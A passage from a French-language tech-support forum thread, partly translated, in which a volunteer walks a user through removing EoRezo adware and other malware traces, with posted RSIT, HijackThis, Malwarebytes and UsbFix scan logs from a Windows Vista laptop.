S3 MSPCLOCK;Proxy d'horloge de répartition Microsoft; C:\Windows\system32\drivers\MSPCLOCK.sys [2008-01-19 5888]
S3 MSPQM;Proxy de gestion de qualité de répartition Microsoft; C:\Windows\system32\drivers\MSPQM.sys [2008-01-19 5504]
S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\Windows\system32\drivers\MSTEE.sys [2008-01-19 6016]
S3 NAVENG;NAVENG; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVENG.SYS [2008-01-21 82256]
S3 NAVEX15;NAVEX15; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVEX15.SYS [2008-01-21 895312]
S3 s816bus;Sony Ericsson Device 816 driver (WDM); C:\Windows\system32\DRIVERS\s816bus.sys [2007-06-19 81832]
S3 s816mdfl;Sony Ericsson Device 816 USB WMC Modem Filter; C:\Windows\system32\DRIVERS\s816mdfl.sys [2007-06-19 13864]
S3 s816mdm;Sony Ericsson Device 816 USB WMC Modem Driver; C:\Windows\system32\DRIVERS\s816mdm.sys [2007-06-19 107304]
S3 s816mgmt;Sony Ericsson Device 816 USB WMC Device Management Drivers (WDM); C:\Windows\system32\DRIVERS\s816mgmt.sys [2007-06-19 99112]
S3 s816nd5;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (NDIS); C:\Windows\system32\DRIVERS\s816nd5.sys [2007-06-19 21928]
S3 s816obex;Sony Ericsson Device 816 USB WMC OBEX Interface; C:\Windows\system32\DRIVERS\s816obex.sys [2007-06-19 97320]
S3 s816unic;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (WDM); C:\Windows\system32\DRIVERS\s816unic.sys [2007-06-19 97704]
S3 SRTSP;SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [2007-11-30 279088]
S3 SRTSPL;SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [2007-11-30 317616]
S3 SYMDNS;SYMDNS; C:\Windows\System32\Drivers\SYMDNS.SYS [2007-10-30 12848]
S3 SYMFW;SYMFW; C:\Windows\System32\Drivers\SYMFW.SYS [2007-10-30 145968]
S3 SYMIDS;SYMIDS; C:\Windows\System32\Drivers\SYMIDS.SYS [2007-10-30 39856]
S3 SYMNDISV;SYMNDISV; C:\Windows\System32\Drivers\SYMNDISV.SYS [2007-10-30 37936]
S3 SYMREDRV;SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [2007-10-30 27696]
S3 usb_rndisx;Carte RNDIS USB; C:\Windows\system32\DRIVERS\usb8023x.sys [2009-04-11 15872]
S3 usbscan;Pilote de scanneur USB; C:\Windows\system32\DRIVERS\usbscan.sys [2008-01-19 35328]
S3 WpdUsb;WpdUsb; C:\Windows\system32\DRIVERS\wpdusb.sys [2009-10-01 40448]
S3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2008-01-19 83328]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R2 HP Health Check Service;HP Health Check Service; c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe [2008-06-16 94208]
R2 hpqddsvc;Service HP CUE DeviceDiscovery; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2007-04-19 75304]
R2 OMSI download service;Sony Ericsson OMSI download service; C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe [2009-04-30 90112]
R2 RapiMgr;@%windir%\WindowsMobile\rapimgr.dll,-104; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 SBSDWSCService;SBSD Security Center Service; C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
R2 WcesComm;@%windir%\WindowsMobile\wcescomm.dll,-40079; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 XAudioService;XAudioService; C:\Windows\system32\DRIVERS\xaudio.exe [2006-11-28 386560]
R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 avast! Web Scanner;avast! Web Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 hpqcxs08;hpqcxs08; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S2 Net Driver HPZ12;Net Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S2 Pml Driver HPZ12;Pml Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S2 SymAppCore;Symantec AppCore Service; c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe []
S3 Com4Qlb;Com4Qlb; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe [2007-01-09 110592]
S3 FontCache;@%systemroot%\system32\FntCache.dll,-100; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S3 getPlusHelper;@C:\Program Files\NOS\bin\getPlus_Helper.dll,-101; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-11-20 136120]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2008-11-04 441712]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-02-12 880640]
S3 stllssvr;stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [2007-02-17 74656]
S3 usnjsvc;Service Messenger Sharing Folders USN Journal Reader; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S4 CLCapSvc;CyberLink Background Capture Service (CBCS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLCapSvc.exe [2007-04-23 262243]
S4 CLSched;CyberLink Task Scheduler (CTS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLSched.exe [2007-04-23 106593]

-----------------EOF-----------------

Malwarebytes' Anti-Malware 1.44
Version de la base de données: 3767
Windows 6.0.6002 Service Pack 2
Internet Explorer 8.0.6001.18882

20/02/2010 22:14:00
mbam-log-2010-02-20 (22-12-53).txt

Type de recherche: Examen complet (C:\|D:\|)
Eléments examinés: 310740
Temps écoulé: 1 hour(s), 24 minute(s), 2 second(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 1
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 1
Fichier(s) infecté(s): 2

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\EoRezo (Rogue.Eorezo) -> No action taken.

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
C:\ProgramData\32868532 (Rogue.Multiple) -> No action taken.

Fichier(s) infecté(s):
C:\Users\maman\AppData\Roaming\avdrn.dat (Malware.Trace) -> No action taken.
C:\Users\maman\AppData\Roaming\fvgqad.dat (Malware.Trace) -> No action taken.

philae
 Posted on 20/02/2010 at 22:40
Grande Maîtresse astucienne

Good evening,

eliot, I'll take over

chimere06200

your PC is indeed infected

* Download and install UsbFix (by C_XX & Chiquitine29) on your Desktop:
* Connect to your PC the external data sources (USB stick, external hard drive, etc.) that may have been infected, without opening them
* Right-click the UsbFix shortcut on your Desktop and choose "Run as administrator".
* Choose option 1 (Recherche [Search])
* Let the tool work.
* Then post the UsbFix.txt report that appears.

Note: The UsbFix.txt report is saved at the root of the disk (C:\UsbFix.txt).
Note: "Process.exe", a component of the tool, is detected by some antivirus products
(AntiVir, Dr.Web, Kaspersky Anti-Virus) as a RiskTool.
It is not a virus, but a utility designed to terminate processes.
In the wrong hands, this utility could stop security software (antivirus, firewall...),
hence the alert raised by these antivirus products.

then

* Connect to your PC the external data sources (USB stick, external hard drive, etc.) that may have been infected, without opening them
* Double-click the UsbFix shortcut on your Desktop
* Choose option 2 (Suppression [Removal])
* Your desktop will disappear and the PC will restart.
* On restart, UsbFix will scan your PC; let the tool work.
* Then post the UsbFix.txt report that appears along with the desktop.

Note: The UsbFix.txt report is saved at the root of the disk (C:\UsbFix.txt) (CTRL+A to select everything, CTRL+C to copy and CTRL+V to paste)

then

* Run Malwarebytes' again for a FULL SCAN and remove everything it can still find. Post the report as well as a new RSIT report

chimere06200
 Posted on 20/02/2010 at 23:29
Petite astucienne

Here is the next part ....


############################## | UsbFix V6.097 |

User : maman (Administrateurs) # FREDERIC
Update on 20/02/2010 by El Desaparecido , C_XX & Chimay8
Start at: 23:14:17 | 20/02/2010
Website : http://pagesperso-orange.fr/NosTools/index.html
Contact : FindyKill.Contact@gmail.com

AMD Athlon(tm) 64 X2 Dual-Core Processor TK-55
Microsoft® Windows Vista™ Édition Familiale Premium (6.0.6002 32-bit) # Service Pack 2
Internet Explorer 8.0.6001.18882
Windows Firewall Status : Disabled
AV : Norton Internet Security 2007 [ (!) Disabled | (!) Outdated ]
FW : Norton Internet Security[ (!) Disabled ]2007

C:\ -> Disque fixe local # 141,35 Go (86,31 Go free) # NTFS
D:\ -> Disque fixe local # 7,7 Go (2,21 Go free) [HP_RECOVERY] # NTFS
E:\ -> Disque CD-ROM
F:\ -> Disque amovible # 983,72 Mo (359,67 Mo free) # FAT

############################## | Processus actifs |

C:\Windows\System32\smss.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\services.exe
C:\Windows\system32\winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\runonce.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Windows\System32\svchost.exe
C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\DRIVERS\xaudio.exe
C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
C:\Windows\system32\WUDFHost.exe
C:\Windows\system32\wbem\wmiprvse.exe

################## | Elements infectieux |

Supprimé ! C:\Users\maman\AppData\Local\Temp\Setup.exe
Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-1000
Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-500
Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-501
Supprimé ! C:\$Recycle.Bin\S-1-5-21-2071026311-1957086265-568470311-500
Supprimé ! D:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-1000
Supprimé ! D:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-501

################## | Registre |

Supprimé ! [HKLM\software\microsoft\shared tools\msconfig\startupreg\CTFMON]

################## | Mountpoints2 |

Supprimé ! HKCU\...\Explorer\MountPoints2\{0c39c2ac-4cb5-11dd-b620-001b24dd66d7}\Shell\Auto\Command
Supprimé ! HKCU\...\Explorer\MountPoints2\{4bee0075-3ed8-11dd-b794-001b24dd66d7}\Shell\AutoRun\Command

################## | Listing des fichiers présent |

[21/08/2007 23:07|--a------|74] C:\autoexec.bat
[11/04/2009 07:36|-rahs----|333257] C:\bootmgr
[18/09/2006 22:43|--a------|10] C:\config.sys
[05/08/2008 16:22|--a------|477] C:\dkab.log
[19/01/2008 21:32|-rahs----|0] C:\IO.SYS
[19/01/2008 21:32|-rahs----|0] C:\MSDOS.SYS
[?|?|?] C:\pagefile.sys
[15/03/2009 17:25|--a------|200820] C:\UpdatedResults.cst
[20/02/2010 23:17|--a------|3662] C:\UsbFix.txt
[11/09/2005 16:18|---hs----|340] D:\AUTOMODE
[22/12/2007 21:52|---hs----|13] D:\BLOCK.RIN
[04/10/2006 00:02|---hs----|438328] D:\bootmgr
[03/11/2006 20:43|---hs----|117] D:\Desktop.ini
[10/09/2002 17:14|---hs----|8134] D:\Folder.htt
[30/11/2007 00:24|---hs----|698] D:\MASTER.LOG
[03/11/2005 16:19|---hs----|181736] D:\protect.ed
[30/11/2007 00:24|---hs----|0] D:\USER
[18/01/2010 10:44|--a------|26058] F:\RIBS.pdf
[12/01/2010 15:54|--a------|3044469] F:\AUDA_VELOSO.pdf
[20/02/2010 23:12|--a------|1624] F:\BOOTEX.LOG

################## | Vaccination |

# C:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).
# D:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).
# F:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).

################## | Upload |

Veuillez envoyer le fichier : C:\UsbFix_Upload_Me_FREDERIC.zip : http://chiquitine.changelog.fr/Sample/Upload.php
Merci pour votre contribution .

################## | ! Fin du rapport # UsbFix V6.097 ! |

Thank you for your patience

philae
 Posted on 20/02/2010 at 23:36
Grande Maîtresse astucienne

OK for UsbFix, now you do the next step

* Run Malwarebytes' again for a FULL SCAN and remove everything it can still find. Post the report as well as a new RSIT report


chimere06200
 Posted on 20/02/2010 at 23:54
Petite astucienne

OK, for now it's churning away

philae
 Posted on 21/02/2010 at 00:30
Grande Maîtresse astucienne

Then let it churn away in peace.........LOL

Tomorrow I probably won't be by before mid or even late afternoon

chimere06200
 Posted on 21/02/2010 at 00:59
Petite astucienne

Full scan:

Malwarebytes' Anti-Malware 1.44
Version de la base de données: 3767
Windows 6.0.6002 Service Pack 2
Internet Explorer 8.0.6001.18882

21/02/2010 00:52:13
mbam-log-2010-02-21 (00-52-13).txt

Type de recherche: Examen complet (C:\|D:\|)
Eléments examinés: 309642
Temps écoulé: 1 hour(s), 18 minute(s), 35 second(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 0

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
(Aucun élément nuisible détecté)

Logfile of random's system information tool 1.06 (written by random/random)
Run by maman at 2010-02-21 00:59:50
Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2
System drive C: has 88 GB (61%) free of 145 GB
Total RAM: 2046 MB (53% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 01:00:11, on 21/02/2010
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18882)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\explorer.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Philips\SA28XX Device Manager\main.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\notepad.exe
C:\Users\maman\Saved Games\Downloads\RSIT.exe
C:\Program Files\trend micro\maman.exe
C:\Windows\system32\msfeedssync.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://fr.msn.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Windows Internet Explorer
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [HP Health Check Scheduler] c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [WAWifiMessage] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Mobile-based device management] %windir%\WindowsMobile\wmdSync.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\RunOnce: [Launcher] %WINDIR%\SMINST\launcher.exe
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Sony Ericsson PC Suite] "C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe" /systray /nologon
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Philips Gestionnaire de périphériques.lnk = C:\Program Files\Philips\SA28XX Device Manager\main.exe
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O13 - Gopher Prefix:
O16 - DPF: {D4323BF2-006A-4440-A2F5-27E3E7AB25F8} - http://a532.g.akamai.net/f/532/6712/5m/virtools.download.akamai.com/6712/player/install/installer.exe
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: Com4Qlb - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard - c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Sony Ericsson OMSI download service (OMSI download service) - Unknown owner - C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: SBSD Security Center Service (SBSDWSCService) - Safer Networking Ltd. - C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Unknown owner - c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe (file missing)
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe

--
End of file - 7999 bytes

======Scheduled tasks folder======

C:\Windows\tasks\HPCeeScheduleFormaman.job
C:\Windows\tasks\Maintenance en 1 clic.job
C:\Windows\tasks\User_Feed_Synchronization-{837C62D4-F802-42E1-BA8C-0E2FF49DE2F0}.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{53707962-6F74-2D53-2644-206D7942484F}]
Spybot-S&D IE Protection - C:\PROGRA~1\SPYBOT~1\SDHelper.dll [2009-01-26 1879896]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{64F56FC1-1272-44CD-BA6E-39723696E350}]
EoBho Class - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
SSVHelper Class - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll [2008-06-10 509328]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7E853D72-626A-48EC-A868-BA8D5E23E045}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-02-17 408440]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"=C:\Program Files\Windows Defender\MSASCui.exe [2008-01-19 1008184]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2007-01-13 827392]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2007-02-13 159744]
"HP Health Check Scheduler"=c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe [2008-06-16 75008]
"hpWirelessAssistant"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [2007-03-01 472776]
"WAWifiMessage"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe [2007-01-10 317128]
"HP Software Update"=C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [2006-12-10 49152]
"EoEngine"= []
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2008-03-02 98304]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
"Windows Mobile-based device management"=C:\Windows\WindowsMobile\wmdSync.exe [2006-11-02 215552]
"NvSvc"=C:\Windows\system32\nvsvc.dll [2007-09-19 86016]
"NvCplDaemon"=C:\Windows\system32\NvCpl.dll [2007-09-19 8497696]
"NvMediaCenter"=C:\Windows\system32\NvMcTray.dll [2007-09-19 81920]
"avast5"=C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe [2010-02-11 2756488]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"=C:\Windows\SMINST\launcher.exe [2006-11-07 44128]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"LightScribe Control Panel"=C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [2007-04-19 484904]
"ehTray.exe"=C:\Windows\ehome\ehTray.exe [2008-01-19 125952]
"Skype"=C:\Program Files\Skype\Phone\Skype.exe [2009-06-26 25604904]
"WMPNSCFG"=C:\Program Files\Windows Media Player\WMPNSCFG.exe [2008-01-19 202240]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe [2009-03-05 2260480]
"Sony Ericsson PC Suite"=C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe [2009-11-20 434176]

